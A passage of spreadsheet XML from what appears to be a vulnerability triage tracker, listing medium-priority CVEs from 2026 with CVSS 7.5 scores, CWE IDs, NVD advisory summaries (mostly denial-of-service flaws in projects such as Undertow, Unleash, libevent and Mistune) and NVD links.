      <c r="S481" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55841</t>
        </is>
      </c>
    </row>
    <row r="482">
      <c r="A482" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B482" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C482" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-5680</t>
        </is>
      </c>
      <c r="D482" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E482" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F482" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G482" s="5" t="inlineStr"/>
      <c r="H482" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I482" s="5" t="inlineStr"/>
      <c r="J482" s="5" t="inlineStr"/>
      <c r="K482" s="5" t="inlineStr"/>
      <c r="L482" s="5" t="inlineStr"/>
      <c r="M482" s="5" t="inlineStr"/>
      <c r="N482" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O482" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P482" s="5" t="inlineStr"/>
      <c r="Q482" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R482" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Undertow. A remote attacker could exploit this vulnerability by sending specially crafted WebSocket messages with permessage-deflate negotiated. This could lead to excessive memory consumption due to the PerMessageDeflateFunction.largerBuffer() method using exponential doubling, resulting in a Denial of Service (DoS) for the affected application.</t>
        </is>
      </c>
      <c r="S482" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-5680</t>
        </is>
      </c>
    </row>
    <row r="483">
      <c r="A483" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B483" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C483" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63421</t>
        </is>
      </c>
      <c r="D483" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E483" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F483" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G483" s="5" t="inlineStr"/>
      <c r="H483" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I483" s="5" t="inlineStr"/>
      <c r="J483" s="5" t="inlineStr"/>
      <c r="K483" s="5" t="inlineStr"/>
      <c r="L483" s="5" t="inlineStr"/>
      <c r="M483" s="5" t="inlineStr"/>
      <c r="N483" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O483" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P483" s="5" t="inlineStr"/>
      <c r="Q483" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-480</t>
        </is>
      </c>
      <c r="R483" s="5" t="inlineStr">
        <is>
          <t>Keystone is a content management system for Node.js. Prior to 6.5.3, the findMany resolver in packages/core/src/lib/core/queries/resolvers.ts compares the signed take argument directly with graphql.maxTake, allowing a remote unauthenticated GraphQL client to provide a negative take value whose magnitude exceeds the configured bound. The bypass also applies to relationship queries and can return more records than the developer intended, potentially exhausting service resources. This issue is fixed in version 6.5.3.</t>
        </is>
      </c>
      <c r="S483" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63421</t>
        </is>
      </c>
    </row>
    <row r="484">
      <c r="A484" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B484" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C484" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63462</t>
        </is>
      </c>
      <c r="D484" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E484" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F484" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G484" s="5" t="inlineStr"/>
      <c r="H484" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I484" s="5" t="inlineStr"/>
      <c r="J484" s="5" t="inlineStr"/>
      <c r="K484" s="5" t="inlineStr"/>
      <c r="L484" s="5" t="inlineStr"/>
      <c r="M484" s="5" t="inlineStr"/>
      <c r="N484" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O484" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P484" s="5" t="inlineStr"/>
      <c r="Q484" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="R484" s="5" t="inlineStr">
        <is>
          <t>Unleash is an open-source feature management platform. Prior to 7.5.2, 7.6.5, and 8.0.2, the shared OpenAPI validation error path in src/lib/error/bad-data-error.ts passes a raw request value from lodash.get to JSON.stringify in genericErrorMessage and fromOpenApiValidationErrors without guarding stack exhaustion. An unauthenticated attacker can send a roughly 10 KB JSON value nested thousands of levels deep to POST /edge/validate, POST /edge/issue-token, or another OpenAPI-validated endpoint, causing RangeError: Maximum call stack size exceeded in openAPIValidationMiddleware and terminating the Node process because no uncaughtException handler recovers it. Replaying the request can sustain a complete service outage. This issue is fixed in versions 7.5.2, 7.6.5, and 8.0.2.</t>
        </is>
      </c>
      <c r="S484" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63462</t>
        </is>
      </c>
    </row>
    <row r="485">
      <c r="A485" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B485" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C485" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63495</t>
        </is>
      </c>
      <c r="D485" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E485" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F485" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G485" s="5" t="inlineStr"/>
      <c r="H485" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I485" s="5" t="inlineStr"/>
      <c r="J485" s="5" t="inlineStr"/>
      <c r="K485" s="5" t="inlineStr"/>
      <c r="L485" s="5" t="inlineStr"/>
      <c r="M485" s="5" t="inlineStr"/>
      <c r="N485" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O485" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P485" s="5" t="inlineStr"/>
      <c r="Q485" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="R485" s="5" t="inlineStr">
        <is>
          <t>Libevent is an event notification library. From 2.2.0-alpha-dev until 2.2.2-alpha, the libevent WebSocket server in ws.c accumulates fragmented frames in evws-&gt;incomplete_frames without enforcing a total message-size limit. An unauthenticated remote client can repeatedly send fragmented WebSocket frames below WS_MAX_RECV_FRAME_SZ with FIN=0, causing the evbuffer to grow without bound until the process or host exhausts memory. This issue is fixed in version 2.2.2-alpha.</t>
        </is>
      </c>
      <c r="S485" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63495</t>
        </is>
      </c>
    </row>
    <row r="486">
      <c r="A486" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B486" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C486" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71360</t>
        </is>
      </c>
      <c r="D486" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E486" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F486" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G486" s="5" t="inlineStr"/>
      <c r="H486" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I486" s="5" t="inlineStr"/>
      <c r="J486" s="5" t="inlineStr"/>
      <c r="K486" s="5" t="inlineStr">
        <is>
          <t>adobe:c2pa, adobe:c2patool</t>
        </is>
      </c>
      <c r="L486" s="5" t="inlineStr"/>
      <c r="M486" s="5" t="inlineStr"/>
      <c r="N486" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O486" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P486" s="5" t="inlineStr"/>
      <c r="Q486" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R486" s="5" t="inlineStr">
        <is>
          <t>CAI Content Credentials is affected by an Uncontrolled Resource Consumption vulnerability that could lead to application denial-of-service. An attacker could exploit this vulnerability to exhaust system resources, resulting in an application denial-of-service condition. Exploitation of this issue does not require user interaction.</t>
        </is>
      </c>
      <c r="S486" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71360</t>
        </is>
      </c>
    </row>
    <row r="487">
      <c r="A487" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B487" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C487" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71626</t>
        </is>
      </c>
      <c r="D487" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E487" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F487" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G487" s="5" t="inlineStr"/>
      <c r="H487" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I487" s="5" t="inlineStr"/>
      <c r="J487" s="5" t="inlineStr"/>
      <c r="K487" s="5" t="inlineStr"/>
      <c r="L487" s="5" t="inlineStr"/>
      <c r="M487" s="5" t="inlineStr"/>
      <c r="N487" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O487" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P487" s="5" t="inlineStr"/>
      <c r="Q487" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R487" s="5" t="inlineStr">
        <is>
          <t>An issue in Invoice Ninja v5.13.24 allows a remote attacker to obtain sensitive information via the StoreWebhookRequest.php, UpdateWebhookRequest.php, and WebhookSingle.php components</t>
        </is>
      </c>
      <c r="S487" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71626</t>
        </is>
      </c>
    </row>
    <row r="488">
      <c r="A488" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B488" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C488" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73786</t>
        </is>
      </c>
      <c r="D488" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E488" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F488" s="5" t="inlineStr">
        <is>
          <t>security-alert@hpe.com</t>
        </is>
      </c>
      <c r="G488" s="5" t="inlineStr"/>
      <c r="H488" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I488" s="5" t="inlineStr"/>
      <c r="J488" s="5" t="inlineStr"/>
      <c r="K488" s="5" t="inlineStr"/>
      <c r="L488" s="5" t="inlineStr"/>
      <c r="M488" s="5" t="inlineStr"/>
      <c r="N488" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O488" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P488" s="5" t="inlineStr"/>
      <c r="Q488" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R488" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the web-based management interface of CPPM could allow an unauthenticated remote attacker to conduct a Denial-of-Service (DoS) attack. Successful exploitation could allow an attacker to cause instability and degrade performance of the vulnerable CPPM server.</t>
        </is>
      </c>
      <c r="S488" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73786</t>
        </is>
      </c>
    </row>
    <row r="489">
      <c r="A489" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B489" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C489" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74761</t>
        </is>
      </c>
      <c r="D489" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E489" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F489" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G489" s="5" t="inlineStr"/>
      <c r="H489" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I489" s="5" t="inlineStr"/>
      <c r="J489" s="5" t="inlineStr"/>
      <c r="K489" s="5" t="inlineStr"/>
      <c r="L489" s="5" t="inlineStr"/>
      <c r="M489" s="5" t="inlineStr"/>
      <c r="N489" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O489" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P489" s="5" t="inlineStr"/>
      <c r="Q489" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R489" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in TopicRegion in Apache ActiveMQ, Apache ActiveMQ Broker, and Apache ActiveMQ All on all platforms.
An authenticated client can spoof clientId when removing a durable topic subscription.
This issue affects Apache ActiveMQ Broker: before 5.19.11, from 6.0.0 before 6.3.2; Apache ActiveMQ All: before 5.19.11, from 6.0.0 before 6.3.2; Apache ActiveMQ: before 5.19.11, from 6.0.0 before 6.3.2.
Users are recommended to upgrade to version 6.3.2 or 5.19.11 which fixes the issue.</t>
        </is>
      </c>
      <c r="S489" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74761</t>
        </is>
      </c>
    </row>
    <row r="490">
      <c r="A490" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B490" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C490" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75328</t>
        </is>
      </c>
      <c r="D490" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E490" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F490" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G490" s="5" t="inlineStr"/>
      <c r="H490" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I490" s="5" t="inlineStr"/>
      <c r="J490" s="5" t="inlineStr"/>
      <c r="K490" s="5" t="inlineStr"/>
      <c r="L490" s="5" t="inlineStr"/>
      <c r="M490" s="5" t="inlineStr"/>
      <c r="N490" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O490" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P490" s="5" t="inlineStr"/>
      <c r="Q490" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R490" s="5" t="inlineStr">
        <is>
          <t>In DocSys-master V2.02.85, the downloadDocEx interface in src/com/DocSystem/controller/DocController.java has an arbitrary file read vulnerability:</t>
        </is>
      </c>
      <c r="S490" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75328</t>
        </is>
      </c>
    </row>
    <row r="491">
      <c r="A491" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B491" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C491" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75368</t>
        </is>
      </c>
      <c r="D491" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E491" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F491" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G491" s="5" t="inlineStr"/>
      <c r="H491" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I491" s="5" t="inlineStr"/>
      <c r="J491" s="5" t="inlineStr"/>
      <c r="K491" s="5" t="inlineStr"/>
      <c r="L491" s="5" t="inlineStr"/>
      <c r="M491" s="5" t="inlineStr"/>
      <c r="N491" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O491" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P491" s="5" t="inlineStr"/>
      <c r="Q491" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R491" s="5" t="inlineStr">
        <is>
          <t>A stack overflow in the loadRawData function of SpaceDot AcubeSAT OBC software commit eaf90ec allows attackers to cause a Denial of Service (DoS) via supplying a crafted ECSS TC message.</t>
        </is>
      </c>
      <c r="S491" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75368</t>
        </is>
      </c>
    </row>
    <row r="492">
      <c r="A492" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B492" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C492" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75371</t>
        </is>
      </c>
      <c r="D492" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E492" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F492" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G492" s="5" t="inlineStr"/>
      <c r="H492" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I492" s="5" t="inlineStr"/>
      <c r="J492" s="5" t="inlineStr"/>
      <c r="K492" s="5" t="inlineStr"/>
      <c r="L492" s="5" t="inlineStr"/>
      <c r="M492" s="5" t="inlineStr"/>
      <c r="N492" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O492" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P492" s="5" t="inlineStr"/>
      <c r="Q492" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R492" s="5" t="inlineStr">
        <is>
          <t>An integer handling flaw in the cobs_decode function of SpaceDot AcubeSAT OBC software commit eaf90ec allows physically-proximate attackers with UART access to cause a Denial of Service (DoS) via a crafted input.</t>
        </is>
      </c>
      <c r="S492" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75371</t>
        </is>
      </c>
    </row>
    <row r="493">
      <c r="A493" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B493" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C493" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75413</t>
        </is>
      </c>
      <c r="D493" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E493" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F493" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G493" s="5" t="inlineStr"/>
      <c r="H493" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I493" s="5" t="inlineStr"/>
      <c r="J493" s="5" t="inlineStr"/>
      <c r="K493" s="5" t="inlineStr"/>
      <c r="L493" s="5" t="inlineStr"/>
      <c r="M493" s="5" t="inlineStr"/>
      <c r="N493" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O493" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P493" s="5" t="inlineStr"/>
      <c r="Q493" s="5" t="inlineStr">
        <is>
          <t>CWE-552</t>
        </is>
      </c>
      <c r="R493" s="5" t="inlineStr">
        <is>
          <t>DocSys V2.02.80 is vulnerable to Any File Download. An attacker does not need to go through authentication to utilize the downloadDocEx.do interface and download any file via the parameter targetPath.</t>
        </is>
      </c>
      <c r="S493" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75413</t>
        </is>
      </c>
    </row>
    <row r="494">
      <c r="A494" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B494" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C494" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75438</t>
        </is>
      </c>
      <c r="D494" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E494" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F494" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G494" s="5" t="inlineStr"/>
      <c r="H494" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I494" s="5" t="inlineStr"/>
      <c r="J494" s="5" t="inlineStr"/>
      <c r="K494" s="5" t="inlineStr"/>
      <c r="L494" s="5" t="inlineStr"/>
      <c r="M494" s="5" t="inlineStr"/>
      <c r="N494" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O494" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P494" s="5" t="inlineStr"/>
      <c r="Q494" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="R494" s="5" t="inlineStr">
        <is>
          <t>Buffer Overflow vulnerability in Open5GS v2.7.7 allows a remote attacker to cause a denial of service via the ogs_sbi_time_parse() function</t>
        </is>
      </c>
      <c r="S494" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75438</t>
        </is>
      </c>
    </row>
    <row r="495">
      <c r="A495" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B495" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C495" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76098</t>
        </is>
      </c>
      <c r="D495" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E495" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F495" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G495" s="5" t="inlineStr"/>
      <c r="H495" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I495" s="5" t="inlineStr"/>
      <c r="J495" s="5" t="inlineStr"/>
      <c r="K495" s="5" t="inlineStr"/>
      <c r="L495" s="5" t="inlineStr"/>
      <c r="M495" s="5" t="inlineStr"/>
      <c r="N495" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O495" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P495" s="5" t="inlineStr"/>
      <c r="Q495" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="R495" s="5" t="inlineStr">
        <is>
          <t>Mistune is a Python Markdown parser with renderers and plugins. Versions 3.3.0 through 3.3.2 are vulnerable to DoS through deeply nested tokens. HTML rendering creates deeply nested emphasis tokens from consecutive asterisk characters, and recursive rendering in HTMLRenderer.render_token() can exceed Python's recursion limit and raise RecursionError, allowing crafted Markdown to crash a parsing process. This issue is fixed in version 3.3.3</t>
        </is>
      </c>
      <c r="S495" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76098</t>
        </is>
      </c>
    </row>
    <row r="496">
      <c r="A496" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B496" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C496" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76905</t>
        </is>
      </c>
      <c r="D496" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E496" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F496" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G496" s="5" t="inlineStr"/>
      <c r="H496" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I496" s="5" t="inlineStr"/>
      <c r="J496" s="5" t="inlineStr"/>
      <c r="K496" s="5" t="inlineStr"/>
      <c r="L496" s="5" t="inlineStr"/>
      <c r="M496" s="5" t="inlineStr"/>
      <c r="N496" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O496" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P496" s="5" t="inlineStr"/>
      <c r="Q496" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R496" s="5" t="inlineStr">
        <is>
          <t>kin-openapi is a Go project for handling OpenAPI files. From 0.10.0 until 0.141.0, openapi3filter.convertParseError in openapi3filter/validation_error_encoder.go dereferences e.Parameter.In without checking whether e.Parameter is nil. A malformed non-string scalar field in a multipart/form-data request body produces a nested ParseError with a nil RequestError.Parameter, and applications that render the validation error through openapi3filter.ConvertErrors or ValidationErrorEncoder panic. An unauthenticated client can repeatedly send such requests to deny service when the application lacks a recovery boundary. JSON request bodies and applications that do not use these error-rendering helpers are not affected. This issue is fixed in version 0.141.0.</t>
        </is>
      </c>
      <c r="S496" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76905</t>
        </is>
      </c>
    </row>
    <row r="497">
      <c r="A497" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B497" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C497" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77384</t>
        </is>
      </c>
      <c r="D497" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E497" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F497" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G497" s="5" t="inlineStr"/>
      <c r="H497" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I497" s="5" t="inlineStr"/>
      <c r="J497" s="5" t="inlineStr"/>
      <c r="K497" s="5" t="inlineStr"/>
      <c r="L497" s="5" t="inlineStr"/>
      <c r="M497" s="5" t="inlineStr"/>
      <c r="N497" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O497" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P497" s="5" t="inlineStr"/>
      <c r="Q497" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-772</t>
        </is>
      </c>
      <c r="R497" s="5" t="inlineStr">
        <is>
          <t>libp2p is a JavaScript implementation of the libp2p networking stack. Prior to version 4.2.9, the reservation refresh path in reservation-store.ts reuses the same retimeableSignal but unconditionally registers another abort listener on every refresh. As a result, a remote peer can repeatedly send valid RESERVE requests for the same reservation, causing unbounded listener and closure growth in @libp2p/circuit-relay-v2 relay servers and leading to denial of service. This issue is fixed in version 4.2.9.</t>
        </is>
      </c>
      <c r="S497" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77384</t>
        </is>
      </c>
    </row>
    <row r="498">
      <c r="A498" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B498" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C498" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77438</t>
        </is>
      </c>
      <c r="D498" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E498" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F498" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G498" s="5" t="inlineStr"/>
      <c r="H498" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I498" s="5" t="inlineStr"/>
      <c r="J498" s="5" t="inlineStr"/>
